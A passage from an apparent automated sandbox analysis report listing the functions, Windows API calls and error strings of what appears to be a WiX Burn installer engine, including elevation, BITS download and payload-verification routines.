GetLastError.KERNEL32(00CBFE15,00CE238C,?,?,?,?,?,00000000,?,00CBFE15,?,?,?), ref: 00CC6385
GlobalFree.KERNEL32(00CBFE15), ref: 00CC63C1

Strings

fileutil.cpp, xrefs: 00CC630F, 00CC639F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$FileGlobalInfoVersion$AllocFreeQuerySizeValue
String ID: fileutil.cpp
API String ID: 2342464106-2967768451
Opcode ID: 1386e1eab5b850cb20c8ab4c784ecc47c9aaf8a8764f4617036564ab9ab507e3
Instruction ID: 339c635aa4bbc93a3d9e39342d4ef678a46ac823e4610d9e1efd7681a4cc0894
Opcode Fuzzy Hash: 1386e1eab5b850cb20c8ab4c784ecc47c9aaf8a8764f4617036564ab9ab507e3
Instruction Fuzzy Hash: 65318F71A0025AABDB115FA5CE45FAFBBB8EF14750F08412DF911E6261D730CD049B90

Function 00C92AE6 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 81COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,00C9130D,80070642,?,?,00C9130D), ref: 00C92AEF
CloseHandle.KERNEL32(000000FF), ref: 00C92BA4

Strings

burn.elevated, xrefs: 00C92B03
open, xrefs: 00C92B54, 00C92B62
Failed to launch elevated child process: %ls, xrefs: 00C92B77
Failed to allocate parameters for elevated process., xrefs: 00C92B28
-q -%ls %ls %ls %u, xrefs: 00C92B08
runas, xrefs: 00C92B4A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCurrentHandleProcess
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2391145178-1352204306
Opcode ID: 64b75a3bcb4057bccd9207aeccfee18fd4480951b735b7dd7fb2da977d2ff714
Instruction ID: 2524de083063190bb5e5caa6ea4de3763f37a1c110fd43676d40896e16a2c424
Opcode Fuzzy Hash: 64b75a3bcb4057bccd9207aeccfee18fd4480951b735b7dd7fb2da977d2ff714
Instruction Fuzzy Hash: C2213971D00208FFCF11EFD5CD89EAEBBF8EF58300B20846AF45AA2111E7719A51AB51

Function 00C9936A Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00C99394
GetProcAddress.KERNEL32(00000000), ref: 00C9939B
GetLastError.KERNEL32 ref: 00C993A5

Strings

Failed to find DllGetVersion entry point in msi.dll., xrefs: 00C993D4
msi, xrefs: 00C9938E
Failed to set variant value., xrefs: 00C99412
Failed to get msi.dll version info., xrefs: 00C993EE
DllGetVersion, xrefs: 00C99389
variable.cpp, xrefs: 00C993CA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
API String ID: 4275029093-842451892
Opcode ID: dbca6808617fa189c8bfa8e91de6ff9e89e6ef78ca410de712c15612b2e31ab3
Instruction ID: ee6156a5d9ba3fb264ebbb075b5e470a57a8246a863eda93bf43bedf16a3c13c
Opcode Fuzzy Hash: dbca6808617fa189c8bfa8e91de6ff9e89e6ef78ca410de712c15612b2e31ab3
Instruction Fuzzy Hash: B811E972A40626B6DB11ABADCC4AFBF7BA8EB44710F11003EFE01E7291DA74DD059295

Function 00C9BAB9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,?,?,00C917CA,?,00000000,?,?,00000000,00000000,?,?,?,00C91E12,?), ref: 00C9BAC6
GetLastError.KERNEL32(?,00C917CA,?,00000000,?,?,00000000,00000000,?,?,?,00C91E12,?), ref: 00C9BAD3
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00C9BB0C
GetLastError.KERNEL32(?,00C917CA,?,00000000,?,?,00000000,00000000,?,?,?,00C91E12,?), ref: 00C9BB16

Strings

Failed to create UX., xrefs: 00C9BB5B
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 00C9BB42
Failed to load UX DLL., xrefs: 00C9BAFF
BootstrapperApplicationCreate, xrefs: 00C9BB06
userexperience.cpp, xrefs: 00C9BAF5, 00C9BB38

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: 2012e726328904a24b57b05e60d01c4c6b8deb6b6d7688a6d4bb64f7dca1f9fc
Instruction ID: 0c45c390b159381b18c86bf0ff1fa453aa7b949a2f6c1a761d6213ce75d54fa6
Opcode Fuzzy Hash: 2012e726328904a24b57b05e60d01c4c6b8deb6b6d7688a6d4bb64f7dca1f9fc
Instruction Fuzzy Hash: 9211EC72B40727B7DB201696ED1EF5B2B549F00B71B09013AFD14E7290F755DC0096D4

Function 00CA25E7 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 156COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00CA25FD
LeaveCriticalSection.KERNEL32(?), ref: 00CA2770

Strings

UX denied while trying to set download URL on embedded payload: %ls, xrefs: 00CA2660
UX did not provide container or payload id., xrefs: 00CA26E2
Engine is active, cannot change engine state., xrefs: 00CA2617
Failed to set download password., xrefs: 00CA272D
UX requested unknown payload with id: %ls, xrefs: 00CA264A
Failed to set download URL., xrefs: 00CA268F
UX requested unknown container with id: %ls, xrefs: 00CA26C2
Failed to set download user., xrefs: 00CA2709

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-2615595102
Opcode ID: f1f1f5cabe90c9922d66dae459c72b2c830d9cc71443b47bf61a7864ef25ca0f
Instruction ID: 0bf067efbb28ff8ff5d2415ee97925951e9c782ffa6ee2c888e938c2cc863b64
Opcode Fuzzy Hash: f1f1f5cabe90c9922d66dae459c72b2c830d9cc71443b47bf61a7864ef25ca0f
Instruction Fuzzy Hash: 9B41F430641B26EFC710EB6CCCC5DAAB7ECEF167147648416F416E7241E2B1DE81A790

Function 00C9A828 Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 139COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,000000F9,00000001,00000000,000000F9,00000031,000000F9,00000105,00000000,?,?,?), ref: 00C9A846
LeaveCriticalSection.KERNEL32(00000000), ref: 00C9A977

Strings

Failed to read variable value type., xrefs: 00C9A959
Failed to read variable included flag., xrefs: 00C9A94B
Failed to read variable value as number., xrefs: 00C9A960
Failed to read variable count., xrefs: 00C9A865
Unsupported variable type., xrefs: 00C9A944
Failed to set variable., xrefs: 00C9A967
Failed to read variable name., xrefs: 00C9A952
Failed to read variable value as string., xrefs: 00C9A938

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-1201737872
Opcode ID: 55f381dced131dd0f577f975d5743b862b9106e60ba8132397a1cec0cfddf8c3
Instruction ID: 232957f82a1f65667c48e8a207dc157d8e8ddbce3763d8159a364e4b365d5e36
Opcode Fuzzy Hash: 55f381dced131dd0f577f975d5743b862b9106e60ba8132397a1cec0cfddf8c3
Instruction Fuzzy Hash: F9418C3190021ABBDF11AE94D849FAF7B78FF00710F168166FE11B6261D7349E41ABE2

Function 00C98D7D Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,00C9FC5A,00000001,00000000,?,00CB3EB0,?,00CB3EB0,?,?,00CB3EB0), ref: 00C98D88
LeaveCriticalSection.KERNEL32(?,?,00CB3EB0,?,?,?,?,00C9FC5A,00000001,00000000,?,00CB3EB0,?,00CB3EB0,?,?), ref: 00C98EAB

Strings

Failed to write variable value type., xrefs: 00C98E93
Failed to write variable value as number., xrefs: 00C98E9A
Failed to write variable value as string., xrefs: 00C98E72
Failed to write variable name., xrefs: 00C98E8C
Failed to write included flag., xrefs: 00C98E85
Failed to write variable count., xrefs: 00C98DA4
0, xrefs: 00C98E50
Unsupported variable type., xrefs: 00C98E7E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: 0$Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.
API String ID: 3168844106-1107513445
Opcode ID: a55f25fb55023f6b3fe136fdc3ec7e29e430bc2d5de75f4cdcc7a1592e0d086a
Instruction ID: 1f4e7a1b67cc8b4d4a3891974c3037c8176065648486801b36aade7a61e1b781
Opcode Fuzzy Hash: a55f25fb55023f6b3fe136fdc3ec7e29e430bc2d5de75f4cdcc7a1592e0d086a
Instruction Fuzzy Hash: D131C03A100B0AAFCF129F64CC58E6F3BA6EB86350B24042DFA1667251DF72DD15AB10

Function 00C97D84 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 148COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C97DA5
_MREFOpen@16.MSPDB140-MSVCRT ref: 00C97DCA

Strings

Failed to format component id string., xrefs: 00C97DB0
Failed to get component path: %d, xrefs: 00C97E2D
Failed to format product code string., xrefs: 00C97DD5
MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 00C97EBB
Failed to set variable., xrefs: 00C97EAB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: 8a0490e2e0745aa644d26adfa41a37a22328ac1f89311f4c4a24664722191ec4
Instruction ID: 9df7b37cdde117b31ff23b9a52bf1be13633dd361cc8b5a534cfd8efbc365f28
Opcode Fuzzy Hash: 8a0490e2e0745aa644d26adfa41a37a22328ac1f89311f4c4a24664722191ec4
Instruction Fuzzy Hash: C141D47292A109FFCF259FA4CC8AE7E7776EF40310B2446BEF121E1091DB318E51A611

Function 00CA0D52 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA0D6F

Strings

Failed to read package id., xrefs: 00CA0D98
Failed to read StopWusaService., xrefs: 00CA0E19
Failed to find package: %ls, xrefs: 00CA0E38
Failed to read action., xrefs: 00CA0DDA
Failed to read package log., xrefs: 00CA0DB9
Failed to execute MSU package., xrefs: 00CA0E69
Failed to read rollback., xrefs: 00CA0DFB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to execute MSU package.$Failed to find package: %ls$Failed to read StopWusaService.$Failed to read action.$Failed to read package id.$Failed to read package log.$Failed to read rollback.
API String ID: 2102423945-2413426928
Opcode ID: 207c523be1aa5ca777167c146b58d3b11635522f98c9e73ce84ef1eedfd6544c
Instruction ID: 2a569409887b0477a1170ded337c2bc6a2e38415940f0c73a24d3f901878681b
Opcode Fuzzy Hash: 207c523be1aa5ca777167c146b58d3b11635522f98c9e73ce84ef1eedfd6544c
Instruction Fuzzy Hash: 8F415872C0011EFBCF11EE95C841DEEB7BCAB55398F204566F960A2150E6305F44AB91

Function 00C91762 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00C91789
GetCurrentThreadId.KERNEL32 ref: 00C9178F
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C91816

Strings

Failed to create engine for UX., xrefs: 00C917A7
Unexpected return value from message pump., xrefs: 00C9186F
engine.cpp, xrefs: 00C91862
Failed to load UX., xrefs: 00C917D1
Failed to start bootstrapper application., xrefs: 00C917EB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp
API String ID: 673430819-3216346975
Opcode ID: 3e5bc1afa86d4c1833a54a1d1741fc4a263b4efa85d5d4b83d1c4c1482bdf24e
Instruction ID: 063a0c380cd59aa9ca2f8e881550f294161b783979c7ac4957c48f800756912b
Opcode Fuzzy Hash: 3e5bc1afa86d4c1833a54a1d1741fc4a263b4efa85d5d4b83d1c4c1482bdf24e
Instruction Fuzzy Hash: 7D416EB1900206AFDF10EBE0CC8AEAE77BCAB54314F254439F916E7190DB34AE45A724

Function 00CB7AC9 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 116comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00CDFBD8,00000000,00000017,00CDFBE8,?,00000000,00000000,?,?,?,?,?,?,?,00CB8130,?), ref: 00CB7B04

Strings

Failed to set BITS job to low priority., xrefs: 00CB7B6C
Failed to set progress timeout., xrefs: 00CB7B7F
Failed to set BITS job to foreground., xrefs: 00CB7B96
WixBurn, xrefs: 00CB7B28
Failed to create BITS job., xrefs: 00CB7B37
Failed to create IBackgroundCopyManager., xrefs: 00CB7B10
Failed to set notification flags for BITS job., xrefs: 00CB7B4F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CreateInstance
String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set BITS job to low priority.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
API String ID: 542301482-4242919803
Opcode ID: 34b93d5b4cc3fdeb6e3add67a8f0099acd77f6ec7616ef64abd532112f101938
Instruction ID: 8b4aff6b8cd4509bb2e54bdccd33fad4721bdda072cfbc214048ec5839791871
Opcode Fuzzy Hash: 34b93d5b4cc3fdeb6e3add67a8f0099acd77f6ec7616ef64abd532112f101938
Instruction Fuzzy Hash: D8316271A04219AFDB10EFA4C8D9DEEB7B8AB48304F10467AEA12E7340D6749D428B90

Function 00CA93A4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 113fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,00CA9C6F,00000000,00000001,?,?,00000000), ref: 00CA93BE
GetLastError.KERNEL32(?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 00CA93CB

Part of subcall function 00CA8281: _memset.LIBCMT ref: 00CA82AB

CloseHandle.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?), ref: 00CA94A8

Strings

cache.cpp, xrefs: 00CA9403
Failed to verify signature of payload: %ls, xrefs: 00CA943B
Failed to verify hash of payload: %ls, xrefs: 00CA947E
Failed to verify catalog signature of payload: %ls, xrefs: 00CA945A
Failed to open payload at path: %ls, xrefs: 00CA9410

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_memset
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 1470872789-2757871984
Opcode ID: 89d543699e36a832a543ea1a479a9a5ac9ecd9cb515c5c017342e6720f6f04ac
Instruction ID: 88c5689ec71443112919299cfc3b8954e966d6e6f2992ee1b9eb11ad06ca3b4f
Opcode Fuzzy Hash: 89d543699e36a832a543ea1a479a9a5ac9ecd9cb515c5c017342e6720f6f04ac
Instruction Fuzzy Hash: A0312B35240207BBDB322A65CC4BF6F3637EFDA728F24C129F924551D0DB368A42E651

Function 00C937C6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,00000000,?,00000000,00000000,00C91E12,00000000,00000000,?,?), ref: 00C9386E
GetLastError.KERNEL32(?,?,?,00C91AC0,?,?,00000000,?,?,00000000,?,?,?,?,?,00000001), ref: 00C93879

Strings

Failed to write exit code to message buffer., xrefs: 00C937EA
Failed to write restart to message buffer., xrefs: 00C93807
Failed to post terminate message to child process., xrefs: 00C9385A
pipe.cpp, xrefs: 00C9389E
Failed to wait for child process exit., xrefs: 00C938A8
Failed to post terminate message to child process cache thread., xrefs: 00C9383E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: ea2ab32c665cf9f28e4bc777bf3d4ee66e37033d245b94e111062cbacaee2524
Instruction ID: 875c86d5709c9950cb7c6ad0c45817c28fb93ce96db4ffcdd855b937f0860439
Opcode Fuzzy Hash: ea2ab32c665cf9f28e4bc777bf3d4ee66e37033d245b94e111062cbacaee2524
Instruction Fuzzy Hash: 0621A632940266BBCF115AA5CC8DF9E7B68EF00720F11016AF914F61D1D774DB05A798

Function 00C97603 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C97619
GetFileAttributesW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00C98BC6,?,?,?,?,?,?), ref: 00C97631
GetLastError.KERNEL32(?,00C98BC6,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00C9763C

Strings

File search: %ls, did not find path: %ls, xrefs: 00C9768F
search.cpp, xrefs: 00C9766D
Failed to set variable., xrefs: 00C976C2
Failed to format variable string., xrefs: 00C97624
Failed get to file attributes. '%ls', xrefs: 00C9767A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: 8499df50b50be8fbe7cad0e7bf9491cedf13f34b4e5969b84a6b1664ac164922
Instruction ID: 8777bc8d6456e0f936445a43d8e406ed72b90b450565994181208d42714be741
Opcode Fuzzy Hash: 8499df50b50be8fbe7cad0e7bf9491cedf13f34b4e5969b84a6b1664ac164922
Instruction Fuzzy Hash: 0A213572956915FAEF121F9CCD4FFAE7626DF00750F240339F910A11A0EB61DE10B691

Function 00C99B4F Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 53registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00C99BD5

Part of subcall function 00CC3841: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,80070002,80070003,00000000,00000000,00000000), ref: 00CC38B2
Part of subcall function 00CC3841: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00CC38EB

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00C99B72
CommonFilesDir, xrefs: 00C99B5D, 00C99B91, 00C99BA0
Failed to open Windows folder key., xrefs: 00C99B87
Failed to read folder path for '%ls'., xrefs: 00C99BA1
Failed to ensure path was backslash terminated., xrefs: 00C99BBF
ProgramFilesDir, xrefs: 00C99B64
+, xrefs: 00C99B57

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: QueryValue$Close
String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 1979452859-3209209246
Opcode ID: 5e1629a6f512602845ed61f5c90dca4f1d7cca6acc6cd774d783371c4ceda8fd
Instruction ID: 2bed311eef31165a4c5949de0d7b35e59e58122380ffdca0a877bdea9dbb8712
Opcode Fuzzy Hash: 5e1629a6f512602845ed61f5c90dca4f1d7cca6acc6cd774d783371c4ceda8fd
Instruction Fuzzy Hash: 9A01F132A40224F7CF22665DEC1BF9EBA68DF40B24F20406EF908B6252D6748F00A2D1

